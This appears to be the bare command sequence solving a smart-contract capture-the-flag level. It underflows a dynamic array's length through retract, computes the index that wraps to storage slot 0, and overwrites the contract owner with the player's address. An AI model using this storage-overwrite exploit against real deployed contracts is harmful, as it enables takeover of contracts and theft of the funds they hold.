# Command: <br />
1.  await contract.make_contact() <br />
2.  await contract.retract() <br />
3. p = web3.utils.keccak256(web3.eth.abi.encodeParameters(["uint256"], [1])) <br />
4. i = BigInt(2 ** 256) - BigInt(p) <br />
5. content = '0x' + '0'.repeat(24) + player.slice(2) <br />
6. await contract.revise(i, content)